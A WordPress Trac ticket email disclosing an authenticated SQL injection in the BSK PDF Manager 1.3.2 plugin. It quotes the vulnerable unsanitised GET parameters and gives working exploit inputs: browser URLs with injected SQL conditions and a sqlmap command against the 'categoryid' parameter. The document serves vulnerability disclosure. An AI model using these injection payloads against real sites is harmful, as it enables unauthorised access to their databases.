[wp-trac] [WordPress Trac] #28869: Wordpress BSK PDF Manager 1.3.2 Authenticated SQL Injection

WordPress Trac noreply at wordpress.org
Sun Jul 13 04:03:48 UTC 2014 

#28869: Wordpress BSK PDF Manager 1.3.2 Authenticated SQL Injection
---------------------------+-----------------------------
 Reporter:  varunchowdary  |      Owner:
     Type:  defect (bug)   |     Status:  new
 Priority:  normal         |  Milestone:  Awaiting Review
Component:  General        |    Version:  trunk
 Severity:  normal         |   Keywords:
  Focuses:                 |
---------------------------+-----------------------------
 ####################### Exploit Title : Wordpress BSK PDF Manager 1.3.2
 Authenticated SQL Injection # Exploit Author : varunchowdary # Vendor
 Homepage : http://www.bannersky.com/bsk-pdf-manager/ # Software Link :
 http://downloads.wordpress.org/plugin/bsk-pdf-manager.zip # Date :
 2014-07-04 # Tested on : Windows 7 / Mozilla Firefox# Linux / Mozilla
 Firefox# Linux / sqlmap 1.0-dev-5b2ded0 ###################### # Location
 :http://localhost/wp-content/plugins/compfight/compfight-search.php
 ###################### # Vulnerable code : [claudio at localhost ~]$ grep -R
 GET bsk-pdf-manager/bsk-pdf-manager/inc/bsk-pdf-dashboard.php:
 if(isset($_GET['view']) && $_GET['view']){bsk-pdf-manager/inc/bsk-pdf-
 dashboard.php: $categories_curr_view = trim($_GET['view']);bsk-pdf-
 manager/inc/bsk-pdf-dashboard.php: if(isset($_GET['categoryid'])
 &&$_GET['categoryid']){bsk-pdf-manager/inc/bsk-pdf-dashboard.php:
 $category_id = trim($_GET['categoryid']);bsk-pdf-manager/inc/bsk-pdf-
 dashboard.php: if(isset($_GET['view']) && $_GET['view']){bsk-pdf-
 manager/inc/bsk-pdf-dashboard.php: $lists_curr_view = trim($_GET['view
 ']);bsk-pdf-manager/inc/bsk-pdf-dashboard.php: if(isset($_GET['pdfid']) &&
 $_GET['pdfid']){bsk-pdf-manager/inc/bsk-pdf-dashboard.php: $pdf_id =
 trim($_GET['pdfid']);  $category_id = trim($_GET['categoryid']);$pdf_id =
 trim($_GET['pdfid']); ###################### Exploit Code via Browser:
 http://127.0.0.1/wp-admin/admin.php?page=bsk-pdf-manager-
 pdfs&view=edit&pdfid=1 and 1=2 http://127.0.0.1/wp-admin/admin.php?page
 =bsk-pdf-manager&view=edit&categoryid=1 and 1=2 Exploit Code via sqlmap:
 sqlmap --cookie='INSERT_WORDPRESS_COOKIE_HERE' -u"http://10.0.0.67/wp-
 admin/admin.php?page=bsk-pdf-manager&view=edit&categoryid=1" -p categoryid

--
Ticket URL: <https://core.trac.wordpress.org/ticket/28869>
WordPress Trac <https://core.trac.wordpress.org/>
WordPress publishing platform

More information about the wp-trac mailing list